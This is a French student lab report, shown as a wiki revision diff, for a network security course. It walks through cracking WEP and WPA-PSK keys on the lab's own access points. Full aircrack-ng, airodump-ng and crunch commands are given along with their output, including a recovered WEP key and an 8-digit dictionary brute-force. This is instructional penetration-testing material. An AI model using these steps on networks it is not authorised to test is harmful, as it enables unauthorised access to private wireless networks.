TP sysres IMA2a5 2021/2022 G6 : Différence entre versions
Ligne 60 : | Ligne 60 : | ||
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID | BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID | ||
44:AD:D9:5F:87:0C -22 6 0 0 9 54e. WPA2 CCMP PSK kracotte13 | 44:AD:D9:5F:87:0C -22 6 0 0 9 54e. WPA2 CCMP PSK kracotte13 | ||
+ | |||
+ | On peut lire que la kracotte13 est sur le canal 9 et que son adresse MAC est 44:AD:D9:5F:87:0C. | ||
+ | |||
+ | On va stocker environ 10000 trames passants par la kracotte dans un fichier "kracotte.txt" avec la commande suivante : | ||
+ | airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w kracotte.txt wlan0mon | ||
+ | |||
+ | On crée ensuite un autre fichier texte avec tous les combinaisons composées de 8 chiffres : | ||
+ | crunch 8 8 0123456789 >> Dico_krakotte13.txt | ||
+ | |||
+ | Pour gagner du temps lors du craquage de la clé, on divise le nouveau fichier en plusieurs fichiers séparés grâce à la commande suivante : | ||
+ | split -b 200m Dico_krakotte13.txt | ||
+ | |||
+ | On lance ensuite plusieurs terminaux et on lance le craquage sur chacuns des fichiers générés : | ||
+ | aircrack-ng -w xaa Dico_krakotte13.txt-13.cap | ||
+ | aircrack-ng -w xab Dico_krakotte13.txt-13.cap | ||
+ | ... |
Version du 29 novembre 2021 à 12:27
1. Tests d’intrusion
1.1 Cassage de clef WEP d’un point d’accès WiFi
On branche tout d'abord le module USB Wi-Pi sur la machine.
On installe ensuite le paquetage aircrack-ng :
apt install aicrack-ng
On lit les interfaces disponibles grâce à la commande airmon-ng :
root@zabeth03:~# airmon-ng PHY Interface Driver Chipset phy2 wlx40a5ef0f68cb rt2800usb Ralink Technology, Corp. RT5370
On passe ensuite la carte Wi-Pi en mode moniteur, espion du réseau sans fil.
root@zabeth03:~# airmon-ng start wlx40a5ef0f68cb PHY Interface Driver Chipset phy2 wlx40a5ef0f68cb rt2800usb Ralink Technology, Corp. RT5370 Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name. (mac80211 monitor mode vif enabled on [phy2]wlan0mon (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :
root@zabeth09:~# airmon-ng --encrypt wep wlan0mon BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:5C -34 5 37 9 3 54e. WEP WEP cracotte13
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.
On récupère ensuite dans un fichier "lcrack" toutes les données concernants la cracotte13 qui transitent sur le canal 3:
airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:5C -38 0 3776 40132 115 3 54e. WEP WEP cracotte13
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :
aircrack-ng lcrack.cap
On obtient rapidement la clé WEP :
Aircrack-ng 1.5.2 [00:00:00] Tested 829 keys (got 263651 IVs) KB depth byte(vote) 0 2/ 3 73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) 1 5/ 1 38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) 2 2/ 9 37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) 3 0/ 1 14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) 4 32/ 4 F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ] Decrypted correctly: 100%
1.2 Cassage de clef WPA-PSK d’un point d’accès WiFi
On repart des manipulations faites pour craquer la clé WEP (jusqu'au changement du nom de l'interface en wlan0mon).
On utilise la commande suivante pour obtenir l'adresse MAC et le canal de la kracotte que l'on souhaite craquer :
airodump-ng wlan0mon BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 44:AD:D9:5F:87:0C -22 6 0 0 9 54e. WPA2 CCMP PSK kracotte13
On peut lire que la kracotte13 est sur le canal 9 et que son adresse MAC est 44:AD:D9:5F:87:0C.
On va stocker environ 10000 trames passants par la kracotte dans un fichier "kracotte.txt" avec la commande suivante :
airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w kracotte.txt wlan0mon
On crée ensuite un autre fichier texte avec tous les combinaisons composées de 8 chiffres :
crunch 8 8 0123456789 >> Dico_krakotte13.txt
Pour gagner du temps lors du craquage de la clé, on divise le nouveau fichier en plusieurs fichiers séparés grâce à la commande suivante :
split -b 200m Dico_krakotte13.txt
On lance ensuite plusieurs terminaux et on lance le craquage sur chacuns des fichiers générés :
aircrack-ng -w xaa Dico_krakotte13.txt-13.cap aircrack-ng -w xab Dico_krakotte13.txt-13.cap ...